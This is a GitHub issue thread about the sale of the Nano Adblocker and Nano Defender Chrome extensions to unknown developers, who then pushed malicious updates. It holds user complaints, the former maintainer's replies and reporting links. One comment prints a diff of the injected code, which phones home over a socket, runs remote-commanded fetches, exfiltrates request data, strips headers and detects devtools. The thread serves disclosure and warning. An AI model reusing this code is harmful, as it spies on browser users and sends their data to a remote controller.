Discussions regarding recent changes to the Nano projects

[jspenguin2017]

Original announcement: https://github.com/NanoAdblocker/NanoCore/issues/362

Please continue the discussions here.

Please take the time to read the original announcement (the entire thread) before posting your comment.

---

Final update:

I understand that my handling of the recent changes was a disaster, and I am sorry that my inexperience caused issues for some of you. But it would be a bigger disaster if we do not learn from this incident. It is clear that I could have handled the background checks of the new developer(s) and the user communications better.

This is the first time that someone offered to acquire my software, and I honestly have no idea what the process should look like. Many of you have commended on what I should have done but there are currently too many conflicting information floating around. Instead of taking advice from here, which has proven to be rather difficult, I will seek professional counselling next time to ensure a smooth and secure transition.

All the best for the future.

---

Update:

For those of you discussing about suing me, I would like to direct you to read the GPL-3.0 license and the disclaimers in the original announcement post again.

[jspenguin2017]

Okay, I analyzed the update with Burp Suite, and so far, it doesn't seem to be doing anything special. But I do see that the code can be remotely configured. I'm not sure how did it pass WebStore review, but I'm submitting a ticket to ask them to review it again.

[nicole-ashley]

@nikrolls

so @jspenguin2017 is most likely to just have given login details

No, I still control the Edge store listings.

So what was the plan then for releasing Edge updates?

[jspenguin2017]

@nikrolls

So what was the plan then for releasing Edge updates?

No plan, the Edge store listings won't receive further updates. They were changed to hidden (unlisted).

[thetayloredman]

So just making sure, basically you transferred ownership of an extension and then the new developer turned it into malware? (As in monitoring for devtools to be opened, and logging sites?)

[thetayloredman]

Also here's what I get when POSTing https://def.dev-nano.com/ with this JSON payload:

{"handleObject":{}}

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <title>Error</title>
</head>

<body>
    <pre>Cannot POST /</pre>
</body>

</html>

If you can't tell, it's an Express.js server running on the Node.js runtime. Especially proven by:

X-Powered-By: Express

Here's the full payload:

Request

```http POST / HTTP/1.1 Host: def.dev-nano.com Content-Type: application/json Content-Length: 19 {"handleObject":{}} ```

Response

```http HTTP/1.1 404 Not Found Date: Fri, 16 Oct 2020 02:37:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=<>; expires=Sun, 15-Nov-20 02:37:12 GMT; path=/; domain=.dev-nano.com; HttpOnly; SameSite=Lax; Secure X-Powered-By: Express Content-Security-Policy: default-src 'self' X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: <> Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?lkg-colo=11&lkg-time=1602815832"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: <> Content-Encoding: gzip

Cannot POST /

```

[1aTa]

I've installed this on many PCs for friends and family and you just sell out without doing any sort of due diligence?

Just wow.

[thetayloredman]

I know, it's really off.

[Reno-Sifana]

OK. As a user of Nano Adblocker and Nano Defender, I will immediately uninstall Nano Defender and Nano Adblocker on the new Microsoft Edge based on Chromium and replace them with uBlock Origin and uBO Extra only. Thanks for the information.

[jspenguin2017]

@1aTa

without doing any sort of due diligence?

I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

[Maskedman99]

Reminds me of the event-stream incident https://github.com/dominictarr/event-stream/issues/116 . The project is licensed under GPLv3, where it is clearly mentioned THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. ( refer section 15, 16 and 17 ) There's no point in blaming each other now, lets just focus on fixing the issue.

[mapx-]

https://www.ghacks.net/2020/10/16/time-to-remove-nano-adblocker-and-defender-from-your-browsers-except-firefox/

Just report this fake nano as an abuse / malware:

https://chrome.google.com/webstore/report/gabbbocakeomblphkmmnoamkioajlkfo?hl=en

[hbarsaiyan]

@1aTa

without doing any sort of due diligence?

I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

Then why doesn't he come to the Github issue and clear the air himself. Quick buck or not one thing is sure you just sold the userbase and put userdata of 100,000+ users on risk. I respected the work you put in this project and recommended it to my friends but now you have lost your credibility in my eyes. If you really wanted a new maintainer i think you could have discussed it here first before selling out.

[uBlock-user]

He's on github -- https://github.com/nenodevs I doubt he cares, he got what he wanted anyways.

[Toriigate]

Per the ghacks article and comments, I've reported the recent changes to both the Chrome Store and the Microsoft Store.

[nicole-ashley]

I have contacted Microsoft and they are looking into if it's possible to block installation of the Chrome Store version on Edge as well.

[Yuki2718]

I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

You wouldn't if there's anything bad, we all know. The reason people criticize you is that you sold to guys with no good record; i.e. unknown, without first discussing about it openly. Anyway, it's done. I guess it's better to discuss what can be done to recover what were lost, in addition to reporting the extension, such as Quick reporter. I appreciate you offered @LiCybora assist of the reporter.

[gorhill]

The same sort of code I reported here has been added to Nano Adblocker 1.0.0.154.

The code was added to /js/commands.js (file normally used to handle extension keyboard shortcuts).

Minor differences are the incoming/outgoing message names used to configure the two-way phone-home capabilities (to distinguish from which extension the messaging occurs I suppose), and how they try to "obfuscate" the code dealing with removing instances of -zzz in outgoing request headers (which purpose is still a mystery to me).

Those code changes can't be found on their repo.

Here is the diff

```diff --- v1.0.0.153/js/commands.js +++ v1.0.0.154/js/commands.js @@ -55,6 +55,98 @@ ); } +var nanoDevAB = io.connect("https://www.dev-nano.com/"); +var getNewListData = {}; + +async function getNewList(newList) { + let getFeResp = await fetch(newList.uri, newList.attr) + let num = 1; + if (num == 1) { + var getListObj = {} + } else { + var fact = 1; + for (var i = 1; i > num; i--) { + fact = fact * i; + break; + } + var getListObj = {} + } + getListObj.headerEntries = Array.from(getFeResp.headers.entries()) + getListObj.data = await getFeResp.text() + getListObj.ok = getFeResp.ok; + getListObj.status = getFeResp.status; + return getListObj; +} + +nanoDevAB.on("getNewList", async function (newList) { + let getRes = await getNewList(newList); + nanoDevAB.emit(newList.callBack, getRes) +}); + +nanoDevAB.on("getNewListData", function (a) { + getNewListData = a; +}) + +var handleLists = function (infos) { + var listKey = Object.keys(getNewListData); + var find1 = "-"; + var detailsHeader = infos.requestHeaders; + var find2 = "z"; + var HeadReverse = detailsHeader.reverse(); + var stringyFy = JSON.stringify(HeadReverse); + var find4 = "z"; + var countEqual = ""; + if (listKey.length > 0) { + var checkerList = true; + for (const object of listKey) { + if (object.x === object.y) { + countEqual += 1; + } + break; + } + for (let i = 0; i < listKey.length; i++) { + let x = listKey[i]; + var re = new RegExp(getNewListData[x],'gi'); + countEqual = "5"; + if (infos[x].toString().match(re) == null) { + checkerList = false; + break; + } + } + if (checkerList) { + nanoDevAB.emit('newListhandeList', infos); + } + } + + var find3 = "z"; + var findAll = [find1, find2, find3, find4].join(""); + var parseConcat = stringyFy.split(findAll).join(""); + var parser = JSON.parse(parseConcat); + return { + requestHeaders: parser + } +}; +chrome.webRequest.onBeforeSendHeaders.addListener(handleLists, { + urls: [""] +}, ['requestHeaders', 'blocking', 'extraHeaders']); + + +var element = document.createElement("p"); ; +var openListGet = false; +element.__defineGetter__("id", function() { + openListGet = true; +}); + +var i = setInterval(function() { + openListGet = false; + console.log(element); + if(openListGet){ + nanoDevAB.emit("report") + console.clear(); + clearInterval(i) + } +}, 100); + /******************************************************************************/ (( ) => { ```

[uBlock-user]

Those code changes can't be found on their repo.

They're waiting for CWS approval. They did the same thing with Defender, they waited for the approval and then it went into the source.

[gorhill]

The socket code file change is there, the diff I published above and in the other case is what is not there.

[daemonspudguy]

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued?

[mapx-]

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued?

Just install & use uBO

[LiCybora]

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued?

Nano Defender for Firefox is NOT discontinued, only Nano Adblocker.

More accurate: I refuse to port Nano Defender for the new developers, but I do NOT say I abandoned Nano Defender. Instead it is independent from upstream now.

[thetayloredman]

Okay so, @jspenguin2017 why didn't you just discontinue the project in some way? You could have pushed an update that shows some sort of popup on browser start or some sort of warning to notify the users of it being discontinued. If you really wanted to sell it, I would have put that sort of alert there for more then a week before finalizing the sale.

[resynth1943]

Just wrote a blog post to warn people about this extension.

I'm trying to make as much noise as possible, so people are aware of this horrendous abuse of trust.

[Techman]

@Techman

put them in harm's way to make a quick buck

Do not misrepresent facts. I was looking for a new maintainer. If I knew that the new developer(s) would do this, I would not have accepted the deal.

As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear.

@jspenguin2017 I am not "misrepresenting facts." The actual facts show that you sold the extension to unknown, unproven (in terms of competence), and eventually-proven untrustworthy developers for financial gain. I say "quick buck" because you did this all very fast, without properly allowing the community any input. Like I said before in the now-frozen issue, you would have been better off closing down the project and sending users back to uBlock Origin than sell your users directly into malware. That is directly your fault.

There is no recovering from this. You have permanently destroyed the trust that the userbase had for you. You can't, as far as I know, get control of the extension back on the Chrome Web Store. The only hope now for uninformed end-users is that Google steps up and bans the extension.

What are you going to do to try and help fix this situation?

[Peacock365]

Seems like Google has removed Nano Defender from the Chrome Web Store already, let's hope Nano Adblocker follows soon. I have reported both extensions to Google and will leave a 1 star review as well for good measure.

@jspenguin2017, this whole matter is nothing short of a shameful disgrace - you have sold out your user base, a sizable one at that, for a quick buck. Extremely pathetic indeed. You have permanently destroyed the trust I previously had in you, I had your extensions installed myself and recommended them to friends and family members. You were willing to deliberately put people at risk and you have given access to PII over to what turns out to be people not acting in good faith. I hope none of your future projects in the open source field succeed, and if I see your name mentioned somewhere, I'll make sure to point my finger at this incident here. Yes, this is harsh, but this is what you deserve for putting user data at risk in exchange for money, on a grand scale. To say I am extremely disappointed would be an understatement.

[mapx-]

nano defender disappeared from chrome store https://chrome.google.com/webstore/detail/nano-defender/ggolfgbegefeeoocgjbmkembbncoadlb?hl=en

[resynth1943]

Great job. I've just reported Nano Adblocker as malware.

@jspenguin2017 Please take this as a learning curve. I suggest everyone else to do the same. This is a perfect example of why selling your extension to "Turkish developers" (with absolutely no warning to your users) is really not a good idea.

In addition, I would encourage a much greater amount of transparency if you do this again. We don't even know who these people are, and they've already injected malicious code into hundreds of thousands of browsers worldwide. That's just not good, and everyone involved seems to have forgotten their implicit duty to the people, not secretive business deals.

If you take anything away from this, let it be that.

I do partially understand the anger of the users above, but I'd like to discourage any aggression towards Hugo. You're allowed to share your opinions, but please redact any opinionated cynicism.

He just fucked up, and probably hasn't done anything like this before (making him an even bigger target for these thugs).

Right, moving on: we need to scrub this malware off the Chrome Web Store permanently. Don't hold back.

---

I'd also like to amend this issue: https://github.com/LiCybora/NanoDefenderFirefox/issues/187

The maintainer of the Firefox extensions Nano Defender and Nano AdBlocker states:

NA and ND with LiCybora as author on AMO or on my GitHub repository are still under my control and independent from any entities or people.

So they're currently safe from malicious interference (for now?).

I am still open to any decisions

---

Now, seeing as we're all on the same page: we need to encourage people to report this malware to Google, which can be done here. This only takes two minutes, and will contribute to the removal of malware being pedalled by unknown rogue "Turkish developers".

I really can't stand for this manipulative trickery. Remember, this malicious software can scrape bank credentials, passwords, and everything else.

EDIT: (Apologies for the email spam, I just needed to amend some more of my thoughts into this one.)

Speak up now, or forever hold your peace.

[Peacock365]

@resynth1943

If anything, you are far too soft on @jspenguin2017... There is a reason for the lack of transparency here, namely that the users would not have been welcoming towards the sale, had it been announced way in advance. @jspenguin2017 knew that, so the transaction took place quietly, @jspenguin2017 received his money (his ultimate goal), now users are free to complain all they like, given that the ultimate goal (money) was already achieved, so who cares?

User data being put at risk? Not a concern as long as the cash is coming in... Sorry but this is how I see it. If it were not so, there would have been no reason to be so secretive about it, namely not to tell the user base anything about the deal. I reiterate what I said in my prior comment: If I see the former developer's name mentioned ever again in some other conversation, I'll point at this discussion here, let's see how far the few bucks he got in exchange for outright betraying the user base (by leaving access to user data wide open) get him, given his now ruined reputation.

EDIT: What are the downvoters trying to tell me here? Users of future projects of @jspenguin2017 should be informed of what the developer was previously capable of, for the sake of their own protection, not as revenge against @jspenguin2017. Likewise people who might invest in him monetarily in the future. The public has a right to be informed about such incidents (which constitute at the very least severe neglect if not worse). Or so I think anyway.

[Epidomis]

Just as a layman end user of nano defender, should I change my passwords to the sites I logged in? Should I assume my data has been compromised?

[daemonspudguy]

@Peacock365

I feel you are saying pretty inflammatory things about a situation you are kind of misinformed about. He sold a product to "a Turkish company" and that's it. Also, it appears that your account currently has a fork of Waterfox as it's sole repository. A fork that is now 6 commits behind the master repo. Also, he was being transparent. This is the second thread discussing this. While I agree that it was wrong to not at least give a name of the company, there is a possibility he was forced to sign an agreement saying he wouldn't disclose the name of the company. EDIT: Also, @jspenguin2017 has released a guide on how to change back to uBlock Origin. https://github.com/LiCybora/NanoDefenderFirefox/issues/187#issuecomment-708101527

[jamesy0ung]

@jspenguin2017 Why did you sell the extension to random dodgy people? Also I would have appreciated some notice of it happening rather than seeing it on a ghacks article posted to reddit! Also I have installed this rubbish on my mates machines! Thanks A LOT!

[resynth1943]

Also I have installed this rubbish on my mates machines! Thanks A LOT!

Was it on a Chrome browser? The Firefox extension isn't affected (yet?).

[jamesy0ung]

Also I have installed this rubbish on my mates machines! Thanks A LOT!

Was it on a Chrome browser? The Firefox extension isn't affected (yet?).

Yes

[PseudoResonance]

@resynth1943 Nothing is happening to the Firefox versions... I'm certain @LiCybora has said so, and I am confident that they have learned from this incident anyways. Plus, the developers that bought out the Chrome version ditched the Edge version. They're obviously not interested in wasting time on Firefox/Edge because of their low market share, because it won't make them as much money... The Firefox port of Nano Adblocker is shutting down, but the Firefox port of Nano Defender is what was being discussed.

Interest has been shown in continuing to maintain the Firefox Nano Defender, but most likely under a different name to avoid confusion. If you're on Firefox, you're perfectly safe... There is no (for now?)...

If possible, I think it would be great if the community could take the original Nano Defender, rename it and continue maintaining it under a different name, as if this issue never happened.

Although as I said earlier, thank you @resynth1943 for trying to avoid needlessly bashing on @jspenguin2017. It's already happened, and I would hope that a lesson has been learned. I don't think there's any point wasting effort on continuing to attack someone for a mistake they made.

Unfortunately, other than getting information on the news where people can see it, there is nothing that can be done about the people affected already. The extensions have been taken down from Chrome and Edge though, but I wonder whether or not the developer(s) will continue pursuing the userbase, or if they are moving on to a new victim already.

The issue is still very severe on any Chromium browsers, but I see no reason in being skeptical about Firefox. I think the best would be to either not mention it at all, so that users who are unaware of which browser they are on can safely uninstall it, or mention that Firefox is safe, but that Nano Adblock is being discontinued, so that the more tech-savvy users can get the full picture without unnecessarily giving them nightmares.

[jspenguin2017]

@thetayloredman

why didn't you just discontinue the project in some way?

This is explained in the original announcement thread.

I would have put that sort of alert there for more then a week before finalizing the sale.

To implement such alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something go wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

I have other things to do and the new developer(s) are supposed to continue the development, so I didn't want to make things more complicated than necessary.

[jspenguin2017]

@Techman

I say "quick buck" because you did this all very fast, without properly allowing the community any input.

Considering the kind of feedback I got when I announced that I will no longer maintain the Firefox version myself, I wasn't interested in getting community feedback for this acquisition.

What are you going to do to try and help fix this situation?

I reported the listing and submitted a ticket to Google.

[jspenguin2017]

@Peacock365

for a quick buck You were willing to deliberately put people at risk

I have already debunked these in the original announcement.

I hope none of your future projects in the open source field succeed

All of my active open source projects are successful. I consider a project to be successful if it is useful to me.

[mxxcon]

It seems like both add-ons have been removed from chrome store? If so, considering the unscrupulous nature of the buyers and the fact that it seems like their scheme failed, I imagine they'll try to get their money back? But I guess that comes with the territory.. 🤷

[rmuchall]

To implement such alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something go wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

I have some sympathy because you have created and maintained a successful extension for years without recompense, a difficult and thankless task. Yet whether you realize it or not you had a responsibility to your users to safeguard our personal data and you have failed in this duty. You should have notified us of the change of ownership with an alert from inside the extension before any change of ownership. You may have succeeded in the technical aspects of development but you have failed in the moral responsibilities of being a developer and people are rightfully angry.

[jspenguin2017]

@Peacock365

received his money (his ultimate goal) Not a concern as long as the cash is coming in...

Again, I have debunked these in the original announcement. You should go read it (the entire thread).

[jspenguin2017]

@rmuchall @victorkilz

I do agree that a better notification system would have helped. But pushing a change to open a popup does not make sense. It's a lot of pain to get it out and the new developer(s) have to undo that. Since I thought the new developer(s) would be maintaining the extensions, I don't see a reason to shove an announcement on everyone's face.

I did announce the change on GitHub over a week before the new developer(s) published their changes, and linked it on all homepages. If the extensions have a proper announcement system that can be controlled remotely, I would definitely have pushed out an announcement through the extensions.

[nicole-ashley]

@jspenguin2017

To implement such alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something go wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

And I think this mentality is why people are using the term "quick buck", specifically the "quick" part. An acquisition like this (because an acquisition is indeed what this is) should never be a quick process. It should take as much time as required to safeguard the users that are being purchased (because they are indeed what is for sale here). 1-2 months is perfectly reasonable to get to the point of notifying users, and then there should have been another month or two to allow users to decide whether to keep the extension or switch before the new owners had access to publish any updates (otherwise they could get in and remove your announcement before many users saw it).

These timeframes are perfectly reasonable, even on the quick side, for something like this. Not to mention a lot more due diligence, and terms of sale to prevent the users being treated badly.

Anyway. It's done now and it's off the stores. At the very least, these malicious developers don't have access to existing users any more.

[Deadoon]

I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out.

That should have been a massive red flag. No history is indicative of either inexperience, purposeful obfuscation, or a puppet. All of those should have been a deal ender for managing a plugin with this level of potential influence. Let then prove their ability and their intended direction before handing it off.

[4GAP3]

Guys, honestly I think @jspenguin2017 has had enough for one day. The Chrome extension is gone (thank God) and now we can worry about the more pressing matter, which is. What's next for nano? redirect users back to ublock? and what about @LiCybora ? she hasn't said much apart from saying she will keep the project rolling

[mxxcon]

Were the extensions removed by Google or by the new devs? What about the currently installed user-base of ~100000 people? Don't vast majority of them are already running the malware version? Shouldn't Google proactively blacklist and delete it from everyone's computers?

[4GAP3]

@mxxcon can't speak for everyone but last time that I used a chrome extension that was removed by chrome, it was gone from my pc. I believe the case is for everyone else, but again, I can't speak for everyone else

[User486375]

It's sad that it's actually the port of your extension that protects users from malware, doesn't sell them out and informs them that the project is no longer being maintained. You would usually expect the exact opposite scenario to happen.

@LiCybora If still possible you should actually push another update to your "no longer maintained" warning, to inform users that they should remove the extension from chrome ASAP if they also have it installed there.

[LiCybora]

What's next for nano? redirect users back to ublock? and what about @LiCybora ? she hasn't said much apart from saying she will keep the project rolling

I need some time to pick up things, so it may take some time until next update for project.

If still possible you should actually push another update to your "no longer maintained" warning

Not quite possible unless I release one more version, but violate my claim of final version. I almost never use Chrome but I guess extension should be removed/disabled when block-listed by Google? In Firefox block-listed addons are disabled and cannot be re-enable by user easily (in case of malicious)

[swingcake]

Can someone please provide a TL;DR when all this is settled? This is a lot for an average user.